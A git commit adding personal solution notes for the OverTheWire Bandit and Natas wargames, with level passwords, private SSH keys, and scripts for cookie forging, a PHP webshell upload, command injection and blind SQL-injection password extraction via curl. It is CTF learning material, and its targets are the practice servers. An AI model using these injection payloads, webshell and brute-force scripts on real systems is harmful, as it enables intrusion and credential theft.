commit 500329a86b6de2cfb10014c21b12519b0478dc23 Author: Emile Clark-Boman Date: Tue Jul 15 22:44:06 2025 +1000 OverTheWire diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..e92f831 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +/* +!.gitignore +!overthewire/ diff --git a/overthewire/bandit/keys/id_bandit14 b/overthewire/bandit/keys/id_bandit14 new file mode 100644 index 0000000..3a9f6d0 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit14 @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+ +gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB +ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb +ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV +ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7 +jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA +J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE +pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67 +xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS +nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD +o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe +ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf +laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS +M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU +1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH +PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s +8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+ +xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1 +GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J +3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY +iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby +9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD +qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0 +kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN +/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA== +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit14.pub b/overthewire/bandit/keys/id_bandit14.pub new file mode 100644 index 0000000..85009e7 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit14.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGSQ4TzdbZw5PshaEVz1o9ppCZAN2DO5cK/6mlkdr75u5KQ36CDS1yvsXDw0sZrn5TN5zasSDRaZ568HXcAihinQxnIROrjq36OT2m43BnAi31eAFm58a1kTBZsVbD+9Us3A5cF7hRZK0ZFbOA+kR5K/lNvVWMtkgF0amFMgrbYCbPpltOEyyIyfIlp8TAn9Pw9A7ebJL3W9QcS6g4wDOhQgPiQ3QwRnf5dqHIrQclWrrwqxU5t59cbW+8DcYAnb2TElqq9F+BiepmvJY3vDcIeM1Thz/YmSn6fwvRKfFo0D5ZgDuOI/JMXSKzy7MyVhDiXUvOH/z8ym+EJAXyvbZ3 diff --git a/overthewire/bandit/keys/id_bandit17 b/overthewire/bandit/keys/id_bandit17 new file mode 100644 index 0000000..20f4684 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit17 @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ +imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ +Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu +DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW +JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX +x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD +KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl +J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd +d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC +YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A +vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama ++TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT +8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx +SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd +HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt +SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A +R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi +Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg +R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu +L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni +blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU +YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM +77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b +dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3 +vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY= +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit17.pub b/overthewire/bandit/keys/id_bandit17.pub new file mode 100644 index 0000000..e69de29 diff --git a/overthewire/bandit/keys/id_bandit26 b/overthewire/bandit/keys/id_bandit26 new file mode 100644 index 0000000..f3f2dee --- /dev/null +++ b/overthewire/bandit/keys/id_bandit26 @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW +pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9 +/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG +xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi +1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix +3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW +qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi +il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w +e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh +Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME +zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX +c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le +wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV +tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI +2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU +i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj +6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm +pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz +JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3 +JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd +1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh +ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe +euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5 +/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t +IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY= +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit26.pub b/overthewire/bandit/keys/id_bandit26.pub new file mode 100644 index 0000000..a793c29 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit26.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmKzYC6iigSp5hZqa3BfaTnP25TUB+XYXxXJdCpu/8tOsjB1alN9p5EdfOvRjRrk57cYH/5bb49F6J/5s9mXNNjVcXCmT4OIeTWSYvSagRbwcm5P3/lduemNLOfR4QB8VrHY5yimOvNWp0ElB6uSPSm6/dRdjTsCySCTIPld6nAYCUk4bFmwyrWhmpDRbb1oG1/KS4aJ7ZvGuhGO4A+tgzijcwya2U0Tl8Lgb0iGrR6rvcwOLXN7p3aMgZx7zverGffTwEDaqFE8k0Ruc96/mAj7m1T5TF5tbwotuTQSGhcH3ncjHeWA4itP1jqyRGOwxIWYLpY387ui+7xDMarF3L diff --git a/overthewire/bandit/passwords.md b/overthewire/bandit/passwords.md new file mode 100644 index 0000000..4f267a0 --- /dev/null +++ b/overthewire/bandit/passwords.md @@ -0,0 +1,159 @@ +bandit0: bandit0 +bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If + `cat readme` +bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx + `cat ./-` +bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx +bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ +bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw +bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG + `find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033` +bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj + `cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null)` +bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc + ` "$KEY.pub" + chmod 600 $KEY* + # login with private key + ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14 + # >>> echo /etc/bandit_pass/bandit14 + ``` +bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo + `echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000` +bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx + `openssl s_client -connect localhost:30001` +bandit17: STORED IN `keys/id_bandit17*` + ```bash + # get all open ports + nmap localhost -T5 -p31000-32000 + | grep open + | awk '{print substr($1, 1, 5)}' + ``` +bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO + `diff passwords.old passwords.new` +bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8 + `ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh` +bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO + `./bandit20-do cat /etc/bandit_pass/bandit20` +bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt + ``` + tmux new -s imbaud + # Ctrl-b + " + BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555 + # Ctrl-b + o + ~/suconnect 5555 + ``` +bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q + `/etc/cron.d/cronjob_bandit22` references binary `/usr/bin/cronjob_bandit22.sh` + which complains about bad privileges for `/tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv` + then cat out the temp file and BOOM +bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga + Similar solution to previous one with `/etc/cron.d/cronjob_bandit23` + `cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)` +bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 + ```bash + # terminal 1: + nc -l -p 5555 + # terminal 2: + echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 + | nc localhost 5555" > /var/spool/bandit24/foo/gibme + ``` +bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4 + '''bash + python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" + | xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" + | nc localhost 30002 + | grep -v "Wrong" + ''' +bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ + First copy the private key from bandit25's home + Then `cat /etc/passwd | grep bandit26` to find what shell bandit26 uses: + # bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext + `cat /usr/bin/showtext` to see it runs the `more` pager then exits. + `more` will enter "command" mode if the terminal window is too small + to view the paged contents, which allows us to run the `v` command + which opens the content in vim instead. Next, do `:set shell=/bin/bash` + and then run vim's `:shell` to GTFO + +bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB + From bandit26 in bash: `./bandit27-do cat /etc/bandit_pass/bandit27` +bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN + ```bash + BOX=$(mktemp -d); echo $BOX + git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX + # use same password as bandit27 login + cd $BOX + # then check README + ``` +bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7 + Do same as bandit28 for `/home/bandit28-git/repo`, then: + `git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md` +bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL + Do what bandit29 did but then: + ```bash + git branch -r # list all remote branches + git fetch --all + ``` +bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy + Similar to bandit30 but use: + ```bash + git tag + git show secret # show the "secret" tag + ``` +bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K + Simply `rm .gitignore` then `git add .; git commit -m "AHHHHH"; git push -u origin` +bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0 + ```bash + # use symbols since uppercase messes everything up + $0 # the shell runs "sh " so "sh $0" => "sh sh" + cat /etc/bandit_pass/bandit33 + ``` + +``` +>>> bandit33@bandit:~/README.md <<< +Congratulations on solving the last level of this game! + +At this moment, there are no more levels to play in this game. However, we are constantly working +on new levels and will most likely expand this game with more levels soon. +Keep an eye out for an announcement on our usual communication channels! +In the meantime, you could play some of our other wargames. + +If you have an idea for an awesome new level, please let us know! +``` + +Learnings: +``` +Connect over SSL/TLS (like telnet/nc does) using openssl: + `openssl s_client -connect HOST:PORT -quiet` + Note: commands starting with "k" will trigger "KEYUPDATE" + run openssl with the `-quiet` flag to avoid this + https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands + +The pager "more" goes into a command mode if the terminal is too small to display +the content. Which allows us to run any command we want. + +Git: + git show :file/path/here # print a file content at specific hash + git branch -r # list all branches stored on the remote +``` diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md new file mode 100644 index 0000000..b6a8f71 --- /dev/null +++ b/overthewire/natas/passwords.md @@ -0,0 +1,282 @@ +natas0: natas0 +natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq + View source +natas2: TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI + View source + enable absolute mode (browser extension) +natas3: 3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH + There's a tracking pixel `` so checking + out the `files/` directory we find `files/users.txt` + +natas4: QryZXc2e0zahULdHrtHxzyYkj59kUxLQ + Check `robots.txt` +natas5: 0n35PkggAPm2zbEpOU802c0x0Msn1ToK + Forge the HTTP "Referer" header + ```bash + http -F \ # follow redirects + -a natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ \ # auth + http://natas4.natas.labs.overthewire.org/index.php \ # host + "Referer: http://natas5.natas.labs.overthewire.org/" # forgery + ``` +natas6: 0RoJwHdSKWFTYR5WuiAewauSuNaBXned + Forge your cookie to be "loggedIn: 1" +natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS + The source references "includes/secret.inc", navigate here + then put the secret into the search widget. +natas8: xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q + Exploit how `index.php` selects the page to load + http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 +natas9: ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t + Find the encoded secret in the source code, decode in python via: + `base64.b64decode(bytes.fromhex(encoded)[::-1]).decode()` +natas10: t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu + Bash injection with the following input + `a b &>/dev/null | cat /etc/natas_webpass/natas10 #` +natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk + Another bash injection + `. /etc/natas_webpass/natas11 #` +natas12: yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB + Exploit that the cookie is in a known format, simply xor + with a known plaintext and see what key repeats. Then use + that key to forge a new cookie with `"showpassword":"yes"`. + NOTE: see [[#Natas11 Solution Script|Appendix/"Natas11 Solution Script"]] +natas13: trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC + Exploit the fact that the upload path is stored in a hidden field of the form, + use Inspect Element to modify this upload path to be `.php` not `.jpg`. Upload + a php webshell (payload and methodology can vary though). Then navigate there. + Via the webshell `cat /etc/natas_webpass/natas13` + NOTE: see [[#Natas12 Solution Script|Appendix/"Natas12 Solution Script"]] +natas14: z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ + Exploit MIME type detection and size limit by generating a tiny 1x1 jpg + and adding a php script to the end. I used the same webshell as I did for natas13. + Then use `cat image.jpg webshell.php > payload.php`. This will be detected + as a jpg and will be viewable as a jpg, modify the hidden form field again + (same as for natas13) and change file path to `.php`. + NOTE: image generation via `magick -size 1x1 pattern:checkerboard image.jpg` +natas15: SdqIqBsFcz3yotlNYErZSZwblkm0lrvx + Exploit SQL injection for the query: +```sql +SELECT * from users where username="{username}" and password="{password}" +``` + Injection Parameters: username:`" or 1=1--`, password:`" --` +natas16: hPkjKYviLQctEW33QmuXL6eDVfMW4sGo + Use the website as an oracle under an SQL injection. + NOTE: see [[#Natas15 Solution Script|Appendix/"Natas15 Solution Script"]] +natas17: EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC + Another oracle attack using an SQL injection. Specifically guess the + password character by character using `grep` to return NOTHING on failure + and the entire password on match ` echo "\$(grep ^.* /etc/natas_webpass/natas17)"` + which will either dump the entire dictionary or nothing (respectively). + NOTE: see [[#Natas16 Solution Script|Appendix/"Natas16 Solution Script"]] +natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ + Another oracle attack using an SQL injection AND this time + using a timing based attack. + NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] + +natas19: +natas20: + + + + +### Learnings +SQL Comments for injections + An appended space character is sometimes required ie `-- ` not `--`. + +### Appendix: +###### Natas11 Solution Script +```python +import base64 as b64 + +PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}''' +COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg=' +FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}''' + + + +def xorbytes(x: bytes, y: bytes) -> bytes: + Lx, Ly = len(x), len(y) + if Lx < Ly: return xorbytes(y, x) + + return bytes(x[i]^y[i%Ly] for i in range(Lx)) + +def extract_key(k: bytes) -> tuple[bytes, int] | None: + Lk = len(k) + substr = b'' + length = 0 + for i in range(Lk): + substr += k[i:i+1] + length += 1 + if k == substr*(Lk//length) + substr[:Lk%length]: + return substr, length + return None + + +def main() -> None: + plaintext = PLAINTEXT.encode() + cookie = b64.b64decode(COOKIE) + decoded = xorbytes(cookie, plaintext) + print('Modulated Key:', ''.join(chr(x) for x in decoded)) + key, key_size = extract_key(decoded) + + forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key)) + print('Forged:', forged_cookie) + + +if __name__ == '__main__': + try: + main() + except (KeyboardInterrupt, EOFError): + print('\n[!] Interrupt') +``` + +###### Natas12 Solution Script +```php + + +
+ + +
+
+&1');
+    }
+?>
+
+ + +``` + + +###### Natas15 Solution Script +```bash +#!/usr/bin/env bash + +req() { + curl http://natas15.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \ + -d "username=natas16\" and $1 -- " \ + -sS \ + | grep exists &>/dev/null +} + +# ie `guess_length "=32"` or `guess_length ">32"` +guess_length() { + req "length(password)$1" +} + +get_length() { + echo "[*] Guessing length" + local MIN=${1:-1} + local MAX=${2:-100} + # local PADMAX=${#MAX} + local FGUESS="%${#MAX}s - %-${#MAX}s" + while true; do + printf "[-] Guess: $FGUESS\r" $MIN $MAX + if [ $((MAX-MIN)) -eq 1 ]; then + break + fi; + + local MID=$(( (MAX+MIN)/2 )) + guess_length ">$MID" && MIN=$MID || MAX=$MID + done + printf "[+] Found: $FGUESS\n" $MIN $MAX + return $MAX +} + +LOWER="abcdefghijklmnopqrstuvwxyz" +UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ" +DIGIT="0123456789" + +guess_regex() { + req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')" +} + +exploit_oracle() { + echo "[@] Forcing oracle exploit" + local PREFIX="" + local LENGTH=$1 + + while true; do + if [ "${#PREFIX}" = "$LENGTH" ]; then + break + fi + + for chars in $LOWER $UPPER $DIGIT; do + local MIN=1 + local MAX=${#chars} + + local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]" + echo -en "[*] ?? $RANGE\r" + guess_regex "$PREFIX$RANGE$POSTFIX" || continue + echo "[+] Found[CHARSET]: $chars" + + local MID=$(( (MAX+MIN)/2 )) + while true; do + echo -en "[*] Guess: $RANGE\r" + if [ $((MAX-MIN)) -eq 1 ]; then + if guess_regex "$PREFIX${chars:MIN-1:1}"; then + PREFIX="${PREFIX}${chars:MIN-1:1}" + else + PREFIX="${PREFIX}${chars:MAX-1:1}" + fi + echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX" + break + fi; + + MID=$(( (MAX+MIN)/2 )) + RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]" + guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID + done + break + done + done + printf "[+] Found: $FGUESS\n" $MIN $MAX +} + +get_length +LENGTH=$? +exploit_oracle "$LENGTH" +``` + +###### Natas16 Solution Script +```sh +#!/usr/bin/env bash + +fcmd() { + # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)' + echo "\$(grep ^$1.* /etc/natas_webpass/natas17)" +} + +req() { + curl http://natas16.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \ + -d "needle=$1" \ + -sS \ + | grep --after-context 2 "
" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+```
+
+
diff --git a/overthewire/natas/scripts/natas11.py b/overthewire/natas/scripts/natas11.py
new file mode 100644
index 0000000..ac778d6
--- /dev/null
+++ b/overthewire/natas/scripts/natas11.py
@@ -0,0 +1,42 @@
+import base64 as b64
+
+PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}'''
+COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg='
+FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}'''
+
+
+
+def xorbytes(x: bytes, y: bytes) -> bytes:
+    Lx, Ly = len(x), len(y)
+    if Lx < Ly: return xorbytes(y, x)
+    
+    return bytes(x[i]^y[i%Ly] for i in range(Lx))
+        
+def extract_key(k: bytes) -> tuple[bytes, int] | None:
+    Lk = len(k)
+    substr = b''
+    length = 0
+    for i in range(Lk):
+        substr += k[i:i+1]
+        length += 1 
+        if k == substr*(Lk//length) + substr[:Lk%length]:
+            return substr, length
+    return None
+
+
+def main() -> None:
+    plaintext = PLAINTEXT.encode()
+    cookie    = b64.b64decode(COOKIE)
+    decoded   = xorbytes(cookie, plaintext)
+    print('Modulated Key:', ''.join(chr(x) for x in decoded))
+    key, key_size = extract_key(decoded)
+
+    forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key))
+    print('Forged:', forged_cookie)
+    
+
+if __name__ == '__main__':
+    try:
+        main()
+    except (KeyboardInterrupt, EOFError):
+        print('\n[!] Interrupt')
diff --git a/overthewire/natas/scripts/natas12.php b/overthewire/natas/scripts/natas12.php
new file mode 100644
index 0000000..8ac4115
--- /dev/null
+++ b/overthewire/natas/scripts/natas12.php
@@ -0,0 +1,16 @@
+
+
+

+
+
+

+
+&1');
+    }
+?>
+

+
+
diff --git a/overthewire/natas/scripts/natas13.php b/overthewire/natas/scripts/natas13.php
new file mode 100644
index 0000000..b5cdafc
Binary files /dev/null and b/overthewire/natas/scripts/natas13.php differ
diff --git a/overthewire/natas/scripts/natas15.sh b/overthewire/natas/scripts/natas15.sh
new file mode 100755
index 0000000..19546d3
--- /dev/null
+++ b/overthewire/natas/scripts/natas15.sh
@@ -0,0 +1,90 @@
+#!/usr/bin/env bash
+
+req() {
+  curl http://natas15.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \
+       -d "username=natas16\" and $1 -- " \
+       -sS \
+    | grep exists &>/dev/null
+}
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  req "length(password)$1"
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
